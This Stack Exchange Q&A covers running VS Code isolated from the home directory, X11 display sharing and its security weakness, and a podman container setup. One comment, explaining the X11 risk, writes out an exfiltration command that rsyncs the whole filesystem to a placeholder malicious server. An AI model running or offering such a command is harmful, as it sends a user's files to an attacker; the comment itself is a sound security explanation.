0

Essentially what I want is to run vscode without giving it permission to read my home directory.

So I created a new user vscode and downloaded the .tar.gz file from https://code.visualstudio.com/#alt-downloads

Now I'm trying to run code as vscode while logged in as me, like this:

~$ su - vscode -c "/home/vscode/code-stable-x64-1638855856/VSCode-linux-x64/bin/code --verbose"
Password: 
[8347:1214/125108.021461:ERROR:browser_main_loop.cc(1402)] Unable to open X display.
The futex facility returned an unexpected error code.
/dev/fd/3: No such file or directory
Server response:

I also tried using ssh -Y vscode@localhost and then starting code from within, which worked, but I'd like to avoid using ssh if possible.

Improve this question
2

2 Answers 2

Reset to default
1

you need to

  1. Set the $DISPLAY variable correctly,
  2. give access to the ~/.Xauthority file
  3. share the socket within the /tmp/.X11-unix directory

Note that once you share your X server with a different client, it's basically the same as running the program as your own user, security-wise: the client can observe the keyboard, take screen shots, synthesize key presses, and I wouldn't be surprised if some lesser-used functionality in the X11 protocol (loading textures? Fonts?) could be abused as remote file reader. Not an expert in the X11 protocol, though.

Since the isolation is super weak, anyway, you could also be less complicated in how you restrict access to your home directory: Containers.

Linux has namespaces, and technologies like docker, kubernetes, snaps and so on depend on that. What you can do is start a process, as a normal user, and give that process a complete own view of the user and file system landscape – one without your home directory.

Podman is one of these technologies, and it's available on debian, IIRC. Installing it should be as straightforward as possible:

sudo apt install -y podman

Then, you should just be able to run containers:

podman run -it --rm debian:sid
#       |   |   |    |
#       +--------------- Run subcommand: run a container
#           |   |    |
#           +----------- interactive, i.e., assign a virtual terminal, 
#               |    |   so you can see and type into an interactive session
#               |    |
#               +------- Remove the container after you're done - no data survives,
#                    |   if it's only in the container. Of course, things on 
#                    |   volumes specified using the -v source_path:destination
#                    |   persist, since they are "outside".
#                    |
#                    +-- name:tag is the way to specify what
#                        container you want to fetch in which version

To run something graphical, you need to allow the things mentioned above, and tell SELinux you're up to things you promise are OK:

podman run -e DISPLAY=$DISPLAY \
            -v /tmp/.X11-unix:/tmp/.X11-unix:Z \
             -v ~/.Xauthority:/root/.Xauthority:Z \
              --security-opt label=type:container_runtime_t \
               -it --rm fedora:35
#           ||||
#           +---- -e INSIDE=OUTSIDE  set an env variable INSIDE inside the
#            |||     container to the value OUTSIDE
#            ||| 
#            +--- -v SOURCE:DEST[:permissions]
#             ||     SOURCE directory or file appears under DEST within
#             ||     container; :Z means that the podman-running users'
#             ||     permissions are translated to root permissions inside.
#             ||     Here, mount the host's X11 socket directory at the same place
#             ||
#             +-- -v SOURCE:DEST[:permissions] again
#              |     Here, mount the podman-running user's ~/.Xauthority
#              |     as /root/.Xauthority owned by root.
#              |     
#              +- --rm -it: see above     
[root@4da385540218 /]#

see how you're suddenly root inside a container that you've started yourself – as non-root!

We can now install vscode into this container, sharing your folder ~/sourcecode as /sourcecode in the container, and using that as user data directory for vscode:

podman run -e DISPLAY=$DISPLAY \
           -v /tmp/.X11-unix:/tmp/.X11-unix:Z \
           -v ~/.Xauthority:/root/.Xauthority:Z \
           --security-opt label=type:container_runtime_t \
           -v ~/sourcecode:/sourcecode:Z \
           -it --rm fedora:35
[root@4da385540218 /]#
 rpm --import https://packages.microsoft.com/keys/microsoft.asc
[root@4da385540218 /]#
 echo -e "[code]\nname=Visual Studio Code\nbaseurl=https://packages.microsoft.com/yumrepos/vscode\nenabled=1\ngpgcheck=1\ngpgkey=https://packages.microsoft.com/keys/microsoft.asc" > /etc/yum.repos.d/vscode.repo
[root@4da385540218 /]#
 dnf --refresh update -y
[root@4da385540218 /]#
 dnf install -y code
[root@4da385540218 /]#
 code --user-data-dir /sourcecode/ --no-sandbox
Improve this answer
16
  • "Note that once you share your X server with a different client, it's basically the same as running the program as your own user, security-wise: ..." - does this also apply in the ssh -Y ... scenario? Commented Dec 14, 2021 at 17:29
  • yes, it does. This is architecture-inherent to X11. Commented Dec 14, 2021 at 17:32
  • Thank you extremely much for this exhaustive answer. I'm having trouble understanding though, if I manage to get it working using su or ssh, how would the supposedly malicious program be able to read files the user it's running under has no permissions of reading? Does sharing my x server allow it to run commands from my user? Excuse me if this is a dumb question I'm not very experienced. Commented Dec 14, 2021 at 17:49
  • @php_nub_qq as said, it allows the program to type arbitrary things on your keyboard, arbitrarily fast. So, yes, opening your desktop environment's "run" dialog (simply by trying out a few things, or by querying via X to figure out who owns the root of all windows, and then just pressing the right keys), then typing in rsync -r / very_malicous_server:/tmp<kbd>Enter</kbd>, for example. What else do you need? Commented Dec 14, 2021 at 17:53
  • 1
    Old X had a "Secure Keyboard" mode, which almost no app used. With xhost access and without "Secure Keyboard", I can read what you type by asking your X server. I wrote a Proof of Concept to demonstrate the point to a multinational company. Commented Dec 14, 2021 at 18:06
0

How do you do these steps ? Set the $DISPLAY variable correctly, give access to the ~/.Xauthority file share the socket within the /tmp/.X11-unix directory

Im new to ubuntu and have no idea what this means or how to do this. I installed code and yesterday i was able to open it, today i wasnt. When i type code --verbose it says "Unable to open X display. The futex facility returned an unexpected error code. /dev/fd/3: No such file or directory" and thats how i ended up here. im in ubuntu 20.04

Improve this answer
4
  • If you are using ubuntu you probably should not worry about what is discussed in this question. Anyway I found that a much better solution is to build the "code" editor myself without microsoft's wrappers. Commented Mar 25, 2022 at 11:46
  • do you know where i can find a solution to my problem then? Commented Mar 25, 2022 at 13:13
  • Not really, you're probably better off asking a new question with your specific issue. Commented Mar 25, 2022 at 14:22
  • If you have a new question, please ask it by clicking the Ask Question button. Include a link to this question if it helps provide context. - From Review Commented Mar 25, 2022 at 20:52

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.